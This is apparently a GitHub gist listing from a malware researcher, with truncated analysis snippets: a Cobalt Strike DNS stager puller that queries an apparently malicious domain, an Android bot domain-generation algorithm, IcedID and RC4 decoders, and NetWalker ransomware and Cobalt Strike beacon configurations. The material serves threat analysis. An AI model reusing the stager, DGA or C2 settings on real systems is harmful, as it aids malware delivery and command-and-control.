import sys
import struct
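# Byte pattern find_pclntab() searches for: the first four bytes are the
# little-endian pclntab header magic 0xFFFFFFFA (introduced with Go 1.16;
# earlier and later Go releases use a different magic), followed by the two
# zero pad bytes that precede the minLC/ptrSize fields. A bytes literal is
# needed so the search works against binary input on Python 3 as well as
# Python 2 (where bytes and str are the same type).
magic = b'\xfa\xff\xff\xff\x00\x00'
# Byte-order tag; 'le' = little-endian, matching the layout of `magic`.
# Presumably used to pick the struct format prefix further down — the rest
# of the script is not shown here.
ver = 'le'
# Target pointer size in bytes (8 = 64-bit binary).
psize = 8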
def find_pclntab(data):
off = data.find(magic)
sysopfb / dns_stager.py
Created April 22, 2021 16:03
CobaltStrike DNS pull script
import dns.resolver
# Hostname suffix that every TXT lookup in the loop below is appended to
# (the '.stage.<id>.' labels are part of the staging name being pulled).
c = '.stage.1950252.updates.updaternetworkmanagerr.com'
# Three single-character label counters, all starting at 'a'; the loop
# builds chr(v)+chr(vv)+chr(vvv) in front of c for each query.
v = vv = vvv = ord('a')
# Loop-control flag; presumably set once the last chunk has been seen
# (the loop body is truncated in this view).
done = False
# Accumulator for the record data collected across the lookups.
out = ""
while not done:
t = dns.resolver.query(chr(v)+chr(vv)+chr(vvv)+c, 'TXT')
sysopfb / dga.md
Created March 4, 2021 17:38
Android bot DGA

DGA code:

import java.util.Calendar;
import java.util.Random;
public class myTest {
    // Seed of the domain generator; GetSeed() below starts from
    // Calendar.getInstance().get(1), i.e. the current YEAR field (the rest
    // of that method is truncated in this view).
    private static long seed;
    // Upper bound on the number of hostnames generated per run — presumably
    // the generator's loop count, which is not shown here.
    private static final int MAX_HOSTS = 2000;
private static void GetSeed(int m) {
        int i = Calendar.getInstance().get(1);
sysopfb / lambo.md
Created November 13, 2020 14:23
Lambo - eCrime correlation effect

The Lambo - eCrime correlation effect

Compiled by Jason Reaves

Lamborghini sales

YEAR Sales Growth
1997 48
sysopfb / decoder.py
Created July 20, 2020 15:41
new icedid photoloader decoder
import sys
import pefile
import struct
def decode(data):
out = ""
for i in range(len(data)/2):
t1 = data[i*2]
t2 = data[(i*2)+1]
t1 &= 0xf0
sysopfb / rc4_ext.py
Created July 18, 2020 19:19
RC4 algorithm with SBOX extension
def decode_data(data, key, sz):
S = list(range(sz))
S = [x&0xff for x in S]
j = 0
out = []
for i in range(sz):
j = (j + S[i] + ord( key[i % len(key)] )) % sz
S[i] , S[j] = S[j] , S[i]
i = j = 0
for char in data:
sysopfb / blah.py
Created July 10, 2020 14:06
Code addition for auto string decode
import yara
# YARA rule used by decoder(): a run of at least six characters from
# [0-9a-zA-Z_|], followed by five literal zeros and one or more digits,
# matched in both ascii and wide (UTF-16LE) encodings. Raw string so the
# regex backslash reaches YARA unchanged.
_URL_RULE_SOURCE = (
    r'rule urls { strings: $a1 = /[0-9a-zA-Z_|]{6,}00000\d+/ ascii wide '
    r'condition: all of them }'
)
rules = yara.compile(source=_URL_RULE_SOURCE)
def decoder(data):
matches = rules.match(data=data)
if matches != []:
matches = matches[0].strings
sysopfb / gist:96f70121bce87c873aa4b9cf692d59d2
Created July 7, 2020 19:01
Analysis notes between thiefquest and normal rc2
Checking the expanded keys shows no difference
t2 uses ThiefQuest's generate_xkey
>>> t2
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B')
t uses a standard key expansion for RC2
>>> t
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B')
sysopfb / gist:8236351ff0540a425da8a77462d5abd7
Created May 29, 2020 14:24
netwalker_00062e5dd2faf97c7b5920be8c9a98b619500d6c_config
{
"lfile": "{id}-Readme.txt",
"spsz": 15360,
"lend": "SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sDQphbmQgeW91ciBoZWFydCByYXRlIGhhcyBpbmNyZWFzZWQgZHVlIHRvIHRoZSBhYmlsaXR5IHRvIHR1cm4gaXQgb2ZmLA0KdGhlbiB3ZSByZWNvbW1lbmQgdGhhdCB5b3UgbW92ZSBhd2F5IGZyb20gdGhlIGNvbXB1dGVyIGFuZCBhY2NlcHQgdGhhdCB5b3UgaGF2ZSBiZWVuIGNvbXByb21pc2VkLg0KUmVib290aW5nL3NodXRkb3duIHdpbGwgY2F1c2UgeW91IHRvIGxvc2UgZmlsZXMgd2l0aG91dCB0aGUgcG9zc2liaWxpdHkgb2YgcmVjb3ZlcnkuDQoNCi0tDQpPdXIgIGVuY3J5cHRpb24gYWxnb3JpdGhtcyBhcmUgdmVyeSBzdHJvbmcgYW5kIHlvdXIgZmlsZXMgYXJlIHZlcnkgd2VsbCBwcm90ZWN0ZWQsDQp0aGUgb25seSB3YXkgdG8gZ2V0IHlvdXIgZmlsZXMgYmFjayBpcyB0byBjb29wZXJhdGUgd2l0aCB1cyBhbmQgZ2V0IHRoZSBkZWNyeXB0ZXIgcHJvZ3JhbS4NCg0KRG8gbm90IHRyeSB0byByZWNvdmVyIHlvdXIgZmlsZXMgd2l0aG
sysopfb / beacons.txt
Last active May 12, 2020 20:34
beacon pivots
Pivot from config at https://twitter.com/VK_Intel/status/1260296104672886790
{
C2_CHUNK_POST: 0
C2_POSTREQ: [('_HEADER', 0, 'Content-Type: application/octet-stream'), ('BUILD', ('PARAMETER', 'id'))]
C2_RECOVER: 
C2_REQUEST: [('BUILD', ('BASE64', 'HEADER', 'Cookie'))]
C2_VERB_GET: GET
C2_VERB_POST: POST
CRYPTO_sCHEME: 1